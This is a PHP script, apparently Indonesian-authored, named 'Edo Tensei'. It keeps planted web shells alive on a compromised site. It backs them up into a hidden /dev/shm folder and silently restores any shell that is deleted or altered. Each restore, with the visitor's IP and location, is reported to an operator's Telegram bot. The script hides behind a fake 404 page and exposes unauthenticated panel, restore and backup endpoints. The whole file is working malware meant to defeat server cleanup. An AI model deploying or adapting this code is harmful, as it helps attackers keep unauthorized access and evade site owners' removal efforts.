<?php
$DOCUMENT_ROOT = rtrim($_SERVER['DOCUMENT_ROOT'] ?? dirname($_SERVER['SCRIPT_FILENAME']), '/');
$configFile = __DIR__ . '/.cfg';
$masterFile = __FILE__;

// ========== FUNGSI ENKRIPSI ==========
function getEncryptionKey() {
    // Kombinasi unique dari server, susah ditebak
    $serverId = md5($_SERVER['HTTP_HOST'] . $_SERVER['SERVER_SOFTWARE'] . __DIR__ . php_uname('n'));
    return substr($serverId, 0, 16);
}

function encryptData($data) {
    if (empty($data)) return '';
    $key = getEncryptionKey();
    $iv = substr(md5($key . 'edo_tensei'), 0, 16);
    return base64_encode(openssl_encrypt($data, 'AES-128-CBC', $key, 0, $iv));
}

function decryptData($data) {
    if (empty($data)) return '';
    $key = getEncryptionKey();
    $iv = substr(md5($key . 'edo_tensei'), 0, 16);
    return openssl_decrypt(base64_decode($data), 'AES-128-CBC', $key, 0, $iv);
}

// ========== FUNGSI DASAR ==========
function loadConfig() {
    global $configFile, $DOCUMENT_ROOT;
    if (!file_exists($configFile)) {
        return ['shells' => [], 'telegram_token' => '', 'telegram_chat_id' => '', 'telegram_enabled' => false];
    }
    
    $config = json_decode(file_get_contents($configFile), true);
    if (!isset($config['shells'])) $config['shells'] = [];
    if (!isset($config['telegram_enabled'])) $config['telegram_enabled'] = false;
    
    // Decrypt Telegram credentials
    if (isset($config['_token_enc']) && !empty($config['_token_enc'])) {
        $config['telegram_token'] = decryptData($config['_token_enc']);
        unset($config['_token_enc']);
    } else {
        $config['telegram_token'] = '';
    }
    
    if (isset($config['_chat_enc']) && !empty($config['_chat_enc'])) {
        $config['telegram_chat_id'] = decryptData($config['_chat_enc']);
        unset($config['_chat_enc']);
    } else {
        $config['telegram_chat_id'] = '';
    }
    
    return $config;
}

function saveConfig($config) {
    global $configFile;
    
    // Encrypt Telegram credentials sebelum disimpan
    $saveConfig = $config;
    if (!empty($config['telegram_token'])) {
        $saveConfig['_token_enc'] = encryptData($config['telegram_token']);
    }
    if (!empty($config['telegram_chat_id'])) {
        $saveConfig['_chat_enc'] = encryptData($config['telegram_chat_id']);
    }
    unset($saveConfig['telegram_token']);
    unset($saveConfig['telegram_chat_id']);
    
    file_put_contents($configFile, json_encode($saveConfig, JSON_PRETTY_PRINT));
    chmod($configFile, 0600); // Hanya owner yang bisa baca
}

function sendTelegram($token, $chatId, $message) {
    if (empty($token) || empty($chatId)) return false;
    $url = "https://api.telegram.org/bot{$token}/sendMessage";
    $data = ['chat_id' => $chatId, 'text' => $message, 'parse_mode' => 'HTML'];
    $opts = ['http' => ['method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data), 'timeout' => 5]];
    @file_get_contents($url, false, stream_context_create($opts));
    return true;
}

function getIPLocation($ip) {
    if (in_array($ip, ['127.0.0.1', '::1', 'localhost', ''])) return 'Local';
    $data = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country,city");
    if ($data) {
        $loc = json_decode($data, true);
        if ($loc['status'] == 'success') return $loc['city'] . ', ' . $loc['country'];
    }
    return 'Unknown';
}

// ========== FULL AUTO-RESTORE DENGAN HASH CHECK ==========
function backupFileWithHash($filePath) {
    if (!file_exists($filePath)) return false;
    
    $backupDir = '/dev/shm/.edobackup/';
    if (!is_dir($backupDir)) mkdir($backupDir, 0777, true);
    
    $backupFile = $backupDir . md5($filePath) . '.bak';
    
    $backupData = [
        'content' => base64_encode(file_get_contents($filePath)),
        'hash' => md5_file($filePath),
        'perms' => fileperms($filePath) & 0777,
        'size' => filesize($filePath),
        'mtime' => filemtime($filePath)
    ];
    
    file_put_contents($backupFile, json_encode($backupData));
    chmod($backupFile, 0444);
    return true;
}

function smartRestore($filePath) {
    $backupDir = '/dev/shm/.edobackup/';
    $backupFile = $backupDir . md5($filePath) . '.bak';
    
    if (!file_exists($backupFile)) return false;
    
    $backupData = json_decode(file_get_contents($backupFile), true);
    if (!$backupData) return false;
    
    $needsRestore = false;
    $reason = '';
    
    // CASE 1: File tidak ada
    if (!file_exists($filePath)) {
        $needsRestore = true;
        $reason = 'DELETED';
    }
    else {
        $currentHash = md5_file($filePath);
        $backupHash = $backupData['hash'];
        
        // CASE 2: Isi file berbeda
        if ($currentHash !== $backupHash) {
            $needsRestore = true;
            $reason = 'CONTENT CHANGED';
        }
        
        // CASE 3: Permission terlalu ketat (auto fix ke 0644)
        $currentPerm = fileperms($filePath) & 0777;
        if ($currentPerm < 0600 && !$needsRestore) {
            chmod($filePath, 0644);
        }
    }
    
    if ($needsRestore) {
        $dir = dirname($filePath);
        if (!is_dir($dir)) mkdir($dir, 0755, true);
        
        file_put_contents($filePath, base64_decode($backupData['content']));
        chmod($filePath, 0644);
        
        return ['restored' => true, 'reason' => $reason];
    }
    
    return ['restored' => false, 'reason' => null];
}

function restoreAllWithCheck() {
    global $DOCUMENT_ROOT, $config;
    $result = ['restored' => 0, 'details' => []];
    
    foreach ($config['shells'] as $shell) {
        $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
        if (empty($absPath)) continue;
        
        $restoreResult = smartRestore($absPath);
        if ($restoreResult['restored']) {
            $result['restored']++;
            $result['details'][] = basename($shell) . " ({$restoreResult['reason']})";
        }
    }
    
    return $result;
}

// ========== TELEGRAM WEBHOOK ==========
function handleWebhook() {
    global $DOCUMENT_ROOT, $config;
    
    $config = loadConfig();
    if (!$config['telegram_enabled'] || empty($config['telegram_token'])) {
        http_response_code(403);
        die('Telegram disabled');
    }
    
    $input = file_get_contents('php://input');
    if (!$input) return;
    
    $update = json_decode($input, true);
    if (isset($update['message'])) {
        $chatId = $update['message']['chat']['id'];
        $text = trim($update['message']['text'] ?? '');
        
        if ($chatId != $config['telegram_chat_id']) {
            sendTelegram($config['telegram_token'], $config['telegram_chat_id'], "⚠️ Unauthorized from: $chatId");
            return;
        }
        
        switch($text) {
            case '/status':
                global $masterFile;
                $status = [];
                foreach ($config['shells'] as $shell) {
                    $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
                    $status[] = file_exists($absPath) ? "✅ " . basename($shell) : "❌ " . basename($shell);
                }
                $msg = "🔮 <b>Edo Tensei Status</b>\n\n";
                $msg .= "📁 Master: " . (file_exists($masterFile) ? "✅ ACTIVE" : "❌ MISSING") . "\n";
                $msg .= "🛡️ Protected: " . count($config['shells']) . " files\n\n";
                $msg .= implode("\n", array_slice($status, 0, 15));
                sendTelegram($config['telegram_token'], $chatId, $msg);
                break;
                
            case '/restore':
                $result = restoreAllWithCheck();
                $msg = "🔄 <b>Smart Restore Completed!</b>\n\n";
                $msg .= "✅ Restored: {$result['restored']} files\n";
                if ($result['restored'] > 0) {
                    $msg .= "\n<b>Details:</b>\n" . implode("\n", array_slice($result['details'], 0, 10));
                }
                sendTelegram($config['telegram_token'], $chatId, $msg);
                break;
                
            case '/backup':
                $count = 0;
                foreach ($config['shells'] as $shell) {
                    $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
                    if (file_exists($absPath)) {
                        backupFileWithHash($absPath);
                        $count++;
                    }
                }
                $msg = "💾 <b>Backup Completed!</b>\n\n📦 Backed up: $count files\n🕐 " . date('Y-m-d H:i:s');
                sendTelegram($config['telegram_token'], $chatId, $msg);
                break;
                
            case '/check':
                $issues = [];
                foreach ($config['shells'] as $shell) {
                    $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
                    if (!file_exists($absPath)) {
                        $issues[] = "❌ MISSING: " . basename($shell);
                    }
                }
                if (empty($issues)) {
                    $msg = "✅ All protected files are present!";
                } else {
                    $msg = "⚠️ <b>Issues found:</b>\n" . implode("\n", $issues);
                }
                sendTelegram($config['telegram_token'], $chatId, $msg);
                break;
                
            case '/help':
                $msg = "🤖 <b>Edo Tensei Commands</b>\n\n";
                $msg .= "/status - Check all files\n";
                $msg .= "/restore - Restore missing/changed files\n";
                $msg .= "/backup - Backup all files\n";
                $msg .= "/check - Quick check only\n";
                $msg .= "/help - This menu";
                sendTelegram($config['telegram_token'], $chatId, $msg);
                break;
                
            default:
                if (!empty($text) && substr($text, 0, 1) == '/') {
                    sendTelegram($config['telegram_token'], $chatId, "❓ Unknown command.\nType /help");
                }
        }
    }
}

// ========== PANEL ==========
function showPanel() {
    global $DOCUMENT_ROOT;
    $config = loadConfig();
    $webhookUrl = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . '?webhook=1';
    
    if (isset($_POST['save_shells'])) {
        $config['shells'] = array_filter(array_map('trim', $_POST['shells'] ?? []));
        // Pertahankan Telegram credentials yang sudah ada
        $oldToken = $config['telegram_token'] ?? '';
        $oldChatId = $config['telegram_chat_id'] ?? '';
        $oldEnabled = $config['telegram_enabled'] ?? false;
        
        saveConfig($config);
        
        // Restore Telegram config setelah save
        $config['telegram_token'] = $oldToken;
        $config['telegram_chat_id'] = $oldChatId;
        $config['telegram_enabled'] = $oldEnabled;
        saveConfig($config);
        
        foreach ($config['shells'] as $shell) {
            $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
            if (file_exists($absPath)) {
                backupFileWithHash($absPath);
            }
        }
        echo "<script>alert('Shells saved with hash backup!');</script>";
    }
    
    if (isset($_POST['save_telegram'])) {
        $config['telegram_token'] = trim($_POST['telegram_token'] ?? '');
        $config['telegram_chat_id'] = trim($_POST['telegram_chat_id'] ?? '');
        $config['telegram_enabled'] = isset($_POST['telegram_enabled']);
        saveConfig($config);
        
        if ($config['telegram_enabled'] && !empty($config['telegram_token'])) {
            $url = "https://api.telegram.org/bot{$config['telegram_token']}/setWebhook?url=" . urlencode($webhookUrl);
            @file_get_contents($url);
            sendTelegram($config['telegram_token'], $config['telegram_chat_id'], "✅ Edo Tensei Bot Active!\n\n📡 Webhook connected\n🛡️ Monitoring enabled (Hash Check + Auto Restore)\n\nCommands:\n/status - Check status\n/restore - Restore all shells\n/backup - Backup all shells\n/check - Quick check\n/help - Menu");
            echo "<script>alert('Telegram connected! Credentials encrypted!');</script>";
        }
    }
    
    if (isset($_GET['restore'])) {
        $result = restoreAllWithCheck();
        if ($config['telegram_enabled']) {
            sendTelegram($config['telegram_token'], $config['telegram_chat_id'], "🔄 Manual restore\nRestored: {$result['restored']} files\nTime: " . date('Y-m-d H:i:s'));
        }
        echo "<script>alert('Restored: {$result['restored']} files');</script>";
    }
    
    if (isset($_GET['backup'])) {
        $count = 0;
        foreach ($config['shells'] as $shell) {
            $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
            if (file_exists($absPath)) {
                backupFileWithHash($absPath);
                $count++;
            }
        }
        if ($config['telegram_enabled']) {
            sendTelegram($config['telegram_token'], $config['telegram_chat_id'], "💾 Manual backup\nBacked up: $count files\nTime: " . date('Y-m-d H:i:s'));
        }
        echo "<script>alert('Backup: $count files');</script>";
    }
    
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>Edo Tensei Panel - Encrypted</title>
        <style>
            *{margin:0;padding:0;box-sizing:border-box;}
            body{background:#0a0c15;font-family:'Segoe UI',Arial,sans-serif;color:#eef5ff;padding:20px;}
            .container{max-width:1000px;margin:0 auto;}
            .header{text-align:center;padding:30px;background:linear-gradient(135deg,#0a0c15,#151a2a);border-radius:20px;margin-bottom:30px;border:1px solid #2a2f45;}
            .header h1{font-size:2.5em;background:linear-gradient(135deg,#00ff9d,#00cc7a);-webkit-background-clip:text;background-clip:text;color:transparent;}
            .card{background:#151a2a;border-radius:16px;border:1px solid #2a2f45;margin-bottom:30px;overflow:hidden;}
            .card-header{padding:20px 25px;background:#1a1f33;border-bottom:1px solid #2a2f45;font-weight:bold;}
            .card-body{padding:25px;}
            .form-group{margin-bottom:20px;}
            label{display:block;margin-bottom:8px;color:#8a92b0;}
            input[type="text"]{width:100%;padding:12px;background:#1a1f33;border:1px solid #2a2f45;border-radius:12px;color:#eef5ff;}
            .shell-row{display:flex;gap:10px;margin-bottom:10px;}
            .shell-row span{background:#2a2f45;padding:10px;border-radius:10px;min-width:45px;text-align:center;}
            .shell-row input{flex:1;}
            button{background:linear-gradient(135deg,#00ff9d,#00cc7a);color:#0a0c15;border:none;padding:12px 24px;border-radius:40px;font-weight:bold;cursor:pointer;margin-right:10px;margin-top:10px;}
            button.secondary{background:#2a2f45;color:#eef5ff;}
            .info-box{background:#1a1f33;border-radius:12px;padding:15px;margin-top:20px;font-size:12px;}
            .grid-2{display:grid;grid-template-columns:1fr 1fr;gap:25px;}
            @media (max-width:700px){.grid-2{grid-template-columns:1fr;}}
            .badge{display:inline-block;padding:5px 12px;border-radius:20px;background:#00ff9d20;color:#00ff9d;border:1px solid #00ff9d;}
            .url-code{background:#0a0c15;padding:10px;border-radius:8px;font-family:monospace;font-size:11px;margin:5px 0;}
            .footer{text-align:center;padding:20px;color:#4a5070;}
            .encrypt-badge{background:#ff444420;color:#ff4444;border-color:#ff4444;}
        </style>
    </head>
    <body>
        <div class="container">
            <div class="header">
                <h1>⚡ Edo Tensei</h1>
                <p>Encrypted Config • Hash Check • Auto Restore</p>
                <div style="margin-top:15px;">
                    <span class="badge">📁 <?= htmlspecialchars($DOCUMENT_ROOT) ?></span>
                    <span class="badge encrypt-badge">🔒 Credentials Encrypted</span>
                </div>
            </div>
            <div class="grid-2">
                <div class="card">
                    <div class="card-header">🛡️ Protected Shells</div>
                    <div class="card-body">
                        <form method="POST">
                            <?php for($i=0;$i<10;$i++): $val = $config['shells'][$i] ?? ''; ?>
                            <div class="shell-row"><span><?= str_pad($i+1,2,'0',STR_PAD_LEFT) ?></span><input type="text" name="shells[]" placeholder="path/to/shell.php" value="<?= htmlspecialchars($val) ?>"></div>
                            <?php endfor; ?>
                            <button type="submit" name="save_shells">💾 Save Shells</button>
                            <a href="?restore=1"><button type="button" class="secondary">🔄 Restore All</button></a>
                            <a href="?backup=1"><button type="button" class="secondary">💾 Backup All</button></a>
                        </form>
                    </div>
                </div>
                <div class="card">
                    <div class="card-header">🤖 Telegram Bot <span style="font-size:10px;background:#00ff9d20;padding:2px 8px;border-radius:10px;">🔒 Encrypted Storage</span></div>
                    <div class="card-body">
                        <form method="POST">
                            <div class="form-group"><label>🤖 Bot Token</label><input type="text" name="telegram_token" placeholder="1234567890:ABCdefGHIjklMNOpqrsTUVwxyz" value="<?= htmlspecialchars($config['telegram_token'] ?? '') ?>"></div>
                            <div class="form-group"><label>📱 Chat ID</label><input type="text" name="telegram_chat_id" placeholder="123456789" value="<?= htmlspecialchars($config['telegram_chat_id'] ?? '') ?>"></div>
                            <div class="form-group"><label><input type="checkbox" name="telegram_enabled" value="1" <?= ($config['telegram_enabled'] ?? false) ? 'checked' : '' ?>> ✅ Enable Telegram</label></div>
                            <button type="submit" name="save_telegram">🔌 Connect Bot (Encrypted)</button>
                        </form>
                        <?php if (!empty($config['telegram_token']) && ($config['telegram_enabled'] ?? false)): ?>
                        <div class="info-box" style="margin-top:15px;background:#00ff9d10;">✅ Telegram: CONNECTED & ENCRYPTED<br>🤖 Bot: <?= substr($config['telegram_token'], 0, 20) ?>...🔒<br>📱 Chat ID: <?= substr($config['telegram_chat_id'], 0, 3) . '***' . substr($config['telegram_chat_id'], -3) ?></div>
                        <?php endif; ?>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header">📡 Access URLs</div>
                <div class="card-body">
                    <div class="url-code">Panel: <?= $_SERVER['SCRIPT_NAME'] ?>?panel</div>
                    <div class="url-code">Telegram Webhook: <?= $_SERVER['SCRIPT_NAME'] ?>?webhook=1</div>
                    <div class="url-code">Manual Restore: <?= $_SERVER['SCRIPT_NAME'] ?>?restore=1</div>
                    <div class="url-code">Manual Backup: <?= $_SERVER['SCRIPT_NAME'] ?>?backup=1</div>
                </div>
            </div>
            <div class="footer">Edo Tensei • Encrypted Config • Hash Check • Auto Restore • No Cronjob</div>
        </div>
    </body>
    </html>
    <?php
}

// ========== MAIN ==========

if (isset($_GET['panel'])) {
    showPanel();
    exit;
}

if (isset($_GET['webhook'])) {
    handleWebhook();
    exit;
}

if (isset($_GET['restore'])) {
    $config = loadConfig();
    $result = restoreAllWithCheck();
    die("Manual restore completed at " . date('Y-m-d H:i:s') . " - Restored: {$result['restored']} files");
}

if (isset($_GET['backup'])) {
    $config = loadConfig();
    $count = 0;
    foreach ($config['shells'] as $shell) {
        $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
        if (file_exists($absPath)) {
            backupFileWithHash($absPath);
            $count++;
        }
    }
    die("Manual backup completed at " . date('Y-m-d H:i:s') . " - Backed up: $count files");
}

if (isset($_GET['status'])) {
    $config = loadConfig();
    echo "=== Edo Tensei Status ===\n";
    echo "Shells: " . count($config['shells']) . "\n";
    echo "Telegram: " . (($config['telegram_enabled'] ?? false) ? "ON (Encrypted)" : "OFF") . "\n";
    foreach ($config['shells'] as $shell) {
        $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
        $status = file_exists($absPath) ? "EXISTS" : "MISSING";
        echo "- $shell: $status\n";
    }
    exit;
}

// ========== STEALTH MODE WITH SMART RESTORE ==========
$config = loadConfig();
$anyRestored = false;
$restoredFiles = [];

foreach ($config['shells'] as $shell) {
    $absPath = $DOCUMENT_ROOT . '/' . ltrim($shell, '/');
    if (empty($absPath)) continue;
    
    $restoreResult = smartRestore($absPath);
    
    if ($restoreResult['restored']) {
        $anyRestored = true;
        $restoredFiles[] = basename($shell) . " ({$restoreResult['reason']})";
    }
}

// Kirim notifikasi ringkasan jika ada restore
if ($anyRestored && ($config['telegram_enabled'] ?? false) && !empty($config['telegram_token'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    $location = getIPLocation($ip);
    
    $msg = "⚠️ <b>AUTO-RESTORE TRIGGERED</b>\n\n";
    $msg .= "📦 Restored: " . count($restoredFiles) . " file(s)\n";
    $msg .= "📁 " . implode(", ", array_slice($restoredFiles, 0, 5)) . "\n\n";
    $msg .= "📍 IP: $ip\n";
    $msg .= "🌍 $location\n";
    $msg .= "🕐 " . date('Y-m-d H:i:s');
    
    sendTelegram($config['telegram_token'], $config['telegram_chat_id'], $msg);
}

// ========== KELUAR SEBAGAI 404 (STEALTH) ==========
header('HTTP/1.1 404 Not Found');
echo "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1><p>The requested resource was not found.</p></body></html>";
?>
